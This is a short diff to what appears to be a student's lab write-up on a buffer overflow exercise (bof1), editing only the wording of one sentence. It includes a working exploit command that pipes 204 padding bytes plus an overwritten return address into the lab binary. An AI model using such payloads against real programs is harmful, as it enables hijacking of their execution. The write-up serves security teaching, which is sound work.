MochiHLam/22110048/bof1.md

 To attack, based on the stackframe we need 204 bytes
 To quit
 `q`
-To generate create 204 bytes by generate 204 character 'a'
+To create 204 bytes by generate 204 characters 'a'
 `echo $(python -c "print('a'*204+'\x6b\x84\x04\x08')") | ./bof1.out 123`
  ![alt text](image-4.png)